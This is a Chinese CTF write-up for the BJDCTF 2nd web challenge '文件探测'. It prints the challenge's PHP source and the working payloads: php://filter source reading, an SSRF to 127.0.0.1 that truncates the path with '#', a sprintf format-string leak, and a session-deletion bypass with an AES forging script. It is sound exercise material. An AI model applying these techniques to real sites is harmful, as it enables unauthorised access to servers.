[BJDCTF 2nd]文件探测

最新推荐文章于 2021-12-21 11:10:34 发布
最新推荐文章于 2021-12-21 11:10:34 发布
阅读量560 收藏
点赞数 2
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_43801002/article/details/107791149
版权

题目
图片.png
过程
1.f12发现hint,里面有home.php。
图片.png
进入home.php,发现url改变,想到php伪协议
/home.php?file=system
尝试php://filter/read=convert.base64-encode/resource=home.php发现报错,联想之前的一个题,可能进去之后自己拼接php,将.php去掉。
读到源码。里面有很多过滤,自己注释一下。

<?php

setcookie("y1ng", sha1(md5('y1ng')), time() + 3600);
setcookie('your_ip_address', md5($_SERVER['REMOTE_ADDR']), time()+3600);

if(isset($_GET['file'])){
    if (preg_match("/\^|\~|&|\|/", $_GET['file'])) {  //过滤了^、~、&、|字符
        die("forbidden");
    }

    if(preg_match("/.?f.?l.?a.?g.?/i", $_GET['file'])){   //不能包含含有flag字符的文件
        die("not now!");
    }

    if(preg_match("/.?a.?d.?m.?i.?n.?/i", $_GET['file'])){  //不能包含含有admin字符的文件
        die("You! are! not! my! admin!");
    }

    if(preg_match("/^home$/i", $_GET['file'])){    //不能只包含home字符串
        die("禁止套娃");
    }

    else{
        if(preg_match("/home$/i", $_GET['file']) or preg_match("/system$/i", $_GET['file'])){
            $file = $_GET['file'].".php";
        }
        else{
            $file = $_GET['file'].".fxxkyou!";   //只能以home和system结尾
        }
        echo "现在访问的是 ".$file . "<br>";
        require $file;
    }
} else {
    echo "<script>location.href='./home.php?file=system'</script>";
}

2.读system.php源码

<?php
error_reporting(0);
if (!isset($_COOKIE['y1ng']) || $_COOKIE['y1ng'] !== sha1(md5('y1ng'))){
    echo "<script>alert('why you are here!');alert('fxck your scanner');alert('fxck you! get out!');</script>";
    header("Refresh:0.1;url=index.php");
    die;
}

$str2 = '       Error:  url invalid<br>~$ ';
$str3 = '       Error:  damn hacker!<br>~$ ';
$str4 = '       Error:  request method error<br>~$ ';

?>

<?php

$filter1 = '/^http:\/\/127\.0\.0\.1\//i';
$filter2 = '/.?f.?l.?a.?g.?/i';


if (isset($_POST['q1']) && isset($_POST['q2']) && isset($_POST['q3']) ) {
    $url = $_POST['q2'].".y1ng.txt";
    $method = $_POST['q3'];

    $str1 = "~$ python fuck.py -u \"".$url ."\" -M $method -U y1ng -P admin123123 --neglect-negative --debug --hint=xiangdemei<br>";

    echo $str1;

    if (!preg_match($filter1, $url) ){
        die($str2);
    }
    if (preg_match($filter2, $url)) {
        die($str3);
    }
    if (!preg_match('/^GET/i', $method) && !preg_match('/^POST/i', $method)) {
        die($str4);
    }
    $detect = @file_get_contents($url, false);
    print(sprintf("$url method&content_size:$method%d", $detect));
}

?>

重点在下半部分。传的参数不能有flag。请求头必须是127.0.0.1
三个post的参数
q1:没有什么过滤
q2:后面拼接y1ng.txt。后面加一个注释符#让其失效。
q3:字符串要么get开头,要么post开头
看到$str1 = "~$ python fuck.py -u \"".$url ."\" -M $method -U y1ng -P admin123123 --neglect-negative --debug --hint=xiangdemei<br>";结合下面的file_get_contents()函数,这里感觉还会有一个admin.php等着我们去读取。
######重点:

$detect = @file_get_contents($url, false);
print(sprintf("$url method&content_size:$method%d", $detect));

这里有一个%d,会使我们读到的源码,以二进制的形式输出。而我们要做的就是让源码以%s字符串格式输出。此处参考Ye’s师傅第一个方法。

  1. %1$s —— 这种办法原理是%1$s会将第一个参数用string类型输出,而这道题中第一个参数便是admin.php的源码,语句是:
    print(sprintf("$url method&content_size:"GET%1\$s%d", \$detect)); %1$s会以字符串格式输出$detect,而%d会输出0
    2.将%d转义掉,替换成%s从而输出字符串。对于sprintf()函数,对百分号的转义是用2个%而不是反斜线
    print(sprintf("\$url method&content_size:"GET%s%%d", \$detect)); %d前的%被转义,因此失效。
    最终读取admin.php的payload为
    q1=1&q2=http://127.0.0.1/admin.php#&q3=GET%s%
    图片.png
    3.读到admin.php源码。
<?php
error_reporting(0);
session_start();
$f1ag = 'f1ag{s1mpl3_SSRF_@nd_spr1ntf}'; //fake

function aesEn($data, $key)
{
    $method = 'AES-128-CBC';
    $iv = md5($_SERVER['REMOTE_ADDR'],true);
    return  base64_encode(openssl_encrypt($data, $method,$key, OPENSSL_RAW_DATA , $iv));
}

function Check()
{
    if (isset($_COOKIE['your_ip_address']) && $_COOKIE['your_ip_address'] === md5($_SERVER['REMOTE_ADDR']) && $_COOKIE['y1ng'] === sha1(md5('y1ng')))
        return true;
    else
        return false;
}

if ( $_SERVER['REMOTE_ADDR'] == "127.0.0.1" ) {
    highlight_file(__FILE__);
} else {
    echo "<head><title>403 Forbidden</title></head><body bgcolor=black><center><font size='10px' color=white><br>only 127.0.0.1 can access! You know what I mean right?<br>your ip address is " . $_SERVER['REMOTE_ADDR'];
}


$_SESSION['user'] = md5($_SERVER['REMOTE_ADDR']);

if (isset($_GET['decrypt'])) {   //只要传入decrypt参数就不会生成随机数
    $decr = $_GET['decrypt'];
    if (Check()){
        $data = $_SESSION['secret'];
        include 'flag_2sln2ndln2klnlksnf.php';
        $cipher = aesEn($data, 'y1ng');  //注意!这里加密的内容是从SESSION中取的,突破点就在这里
        if ($decr === $cipher){
            echo WHAT_YOU_WANT;   
        } else {
            die('爬');
        }
    } else{
        header("Refresh:0.1;url=index.php");
    }
} else {
    //I heard you can break PHP mt_rand seed
    mt_srand(rand(0,9999999));   //这里的种子是真随机了,无法爆破
    $length = mt_rand(40,80);
    $_SESSION['secret'] = bin2hex(random_bytes($length));
}
?>

php种子,这次是真随机了。没法爆破。看一下算法。
对那个随机数$_SESSION[‘secret’]进行aes加密操作,如果加密结果和我们传进去的decrypt相同就会输出flag:
这个生成的不能被破解的随机字符串被放在了session中,如果没有了session就没有了这个随机字符串,只要通过删除PHPSESSID将SESSION置空即可。

session绕过。删除cookie,没有cookie中的SESSIONID就找不到对应的session文件,相应的$_SESSION[‘var’]就为NULL,传参NULL。
引用自: https://www.jianshu.com/p/9c031dee57b7
这样一来就有了思路,访问admin.php时删除cookie。
4.此处计算aes的脚本。

<?php
function aesEn($data, $key)
{
    $method = 'AES-128-CBC';
    $iv = md5('8.8.8.8', true); // your global ip address here
    return  base64_encode(openssl_encrypt($data, $method,$key, OPENSSL_RAW_DATA , $iv));
}

$cipher = aesEn('', 'y1ng');
echo $cipher;

这里还有个坑,密钥中是有+符号的,直接用明文去访问得不到Flag!所以URL编码一下,然后删除掉SESSION再访问就可以得到Flag:

浩歌已行
关注
  • 2
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
敏感文件目录探测
聚鼎安全
12-11 2043
目录敏感文件目录探测探测方法常见敏感文件或目录常用后台工具扫描web 爬虫搜索引擎文件路径查看源码源码审计漏洞利用社会工程专门的技术支持目录旁站C段子域名 敏感文件目录探测 敏感文件、敏感目录挖掘一般都是靠工具、脚本来找,当然大佬手工也能找得到。 探测方法 常见敏感文件或目录 通常我们所说的敏感文件、敏感目录大概有以下几种: 后台 robots.txt 数据库log sitemap.xml mysql.sql licence.txt Git hg/Mercurial svn/Subversion bzr/
[BJDCTF 2nd]EasyAspDotNet 记录
SopRomeo的博客
03-27 687
一道windows题,赵老板还是厉害。 本篇为自己本人记录不是详情题解 赵老板发的文章 赵老板题解 赵老板文章里的一句话: 打 CTF 的同学也请把眼光放远一些,不要给自己创造舒适区,多接触一些新的东西。 微软的漏洞,产生的原因是每台 Exchange Server 安装完后在某个 Component 中都使用了同一把固定的 Machine Key,可以通过这个KEY篡改 ASP.NET Form...
敏感目录文件探测工具
good good study
12-21 3011
-h 查看帮助 -u xx 目标域名xx -e php 扫描网站的类型为php, php,asp -t 40 线程为40,默认为30 -x 400, 404, 503 排除响应码400...,即响应码为这个的不输出到屏幕上 例子1 以线程为40的速度扫描php的网站,不显示503,400,404状态码 dirsearch.py -t 40 -e php -x 503,404,400-u...
BJDCTF 2nd writeup(二)
01-21
文章目录Misc[BJDCTF 2nd]A_Beautiful_Picture[BJDCTF 2nd]小姐姐-y1ng[BJDCTF 2nd]TARGZ-y1ng[BJDCTF 2nd]Imagin – 开场曲Crypto[BJDCTF 2nd]cat_flag[BJDCTF 2nd]燕言燕语[BJDCTF 2nd]Y1nglish Misc [BJDCTF 2nd]...
BJDCTF 2nd–TARGZ
12-21
审题,tar没用,不需要爆破 下载附件得到tar.gz压缩包 查看16进制的时候发现是PK的头,对应的题目的提示tar不好使(就是不tar压缩的) ...发现可以解压但是得到的还是压缩包,继续重复操作… 当时我解了半小时(时间沉dedao...
CTF-Pwn-[BJDCTF 2nd]rci
01-09
CTF-Pwn-[BJDCTF 2nd]rci 博客说明 文章所涉及的资料来自互联网整理和个人总结,意在于个人学习和经验汇总,如有什么地方侵权,请联系本人删除,谢谢!本文仅用于学习与交流,不得用于非法用途! CTP平台 网址 ...
Symbian 2nd 文件浏览器
12-31
一款好用的Symbian 2nd文件浏览器,还可以查看正在运行的任务
文件探测文件探测
11-11
检测电脑中的不知名的隐藏文件 以及被其他软件隐藏后忘记密码 或重装系统后的文件
文件探测
07-18
文件探测文件探测器<br>用来探测通过软件隐藏的文件
BJDCTF 2nd菜鸡做题记录
bmth666的博客
03-25 3104
文章目录 萌新赛 做了一下web,感觉还没有入门,太难了吧,然后看大佬博客把能写的复现一下 [BJDCTF 2nd]简单注入 这道题没写出来,想了好久才想到可以用\转义掉',然后就开始盲注,发现禁用了select,尝试绕过未果,卡死,看师傅文章才发现可以正则匹配出password,妙呀,先写一下我的思路 username=\ password=...
[BJDCTF2020]EasySearch
SopRomeo的博客
03-31 3710
sql注入没回显,扫描一下后台,最后用御剑扫描到了index.php.swp 进去是一段源代码 <?php ob_start(); function get_hash(){ $chars = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789!@#$%^&*()+-'; $random = $c...
BJDCTF-文件探测-ssrf+逻辑漏洞
qq_42188168的博客
03-24 402
一、ssrf 信息收集了一波,发现home.php这个hint以及admin.php,访问 随后用伪协议读取system.php的源码和 <?php error_reporting(0); if (!isset($_COOKIE['y1ng']) || $_COOKIE['y1ng'] !== sha1(md5('y1ng'))){ echo "<script>al...
BJDCTF 2nd WEB
A_dmin的博客
03-24 7336
BJDCTF 2nd WEB emmm,比赛做了几道题,赛后官方给了wp,把没做出来的复现一下,,,, [BJDCTF 2nd]fake google 一个SSTI,发现是jinja2的,直接用payload打就行: {% for c in [].__class__.__base__.__subclasses__() %} {% if c.__name__=='_IterationGuard' %...
敏感文件探测
liuy_uzhi的博客
07-17 1792
1、python环境配置 2、敏感文件探测实践 敏感文件类型: (1)网站管理后台 (2)数据文件 (3)备份文件 敏感文件探测原理 (1)猜测文件名,然后根据返回的http状态码判断文件是否存在(例如:200文件存在、301文件发生跳转、404文件不存在) (2) 3、改进思路 (1)php的站点用ASP的字典扫描无用。判断常见的网站脚本类型?(ASP、PHP、ASPX、JS...
[BJDCTF 2nd]EasyAspDotNet
weixin_43610673的博客
03-25 511
知识点:ASP.NET VIEWSTATE反序列化、CVE-2020-0688、windows基础命令 Windows + ASP.NET编写的网站,知识盲区,特别记录一下 别的什么都没有,就这个按钮很可疑,F12看一下 感觉应该是文件包含,但不知道要包含什么,看wp得知web.config Web.config文件是一个XML文本文件,它用来储存ASP.NETWeb 应用程序的配置信息(如最常用...
文件类型探测程序 (转)
circularr9834的博客
08-13 99
文件类型探测程序 (转)[@more@]文件类型探测程序 文/Mailto:zxn@hq.cninfo.NET">赵湘宁 本文例子程序 记得我以前写过一篇文章是关于如何从一个可执行程序中吸取图标。本文将讨论如何得到与...
the2nd try
最新发布
01-07
the2nd try指的是第二次尝试或尝试做某件事情的第二次。在生活中,我们常常会遇到各种困难和挑战,有时候第一次尝试可能会失败,但是并不意味着就此放弃。the2nd try给予了我们第二次机会,让我们可以重新审视问题,...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值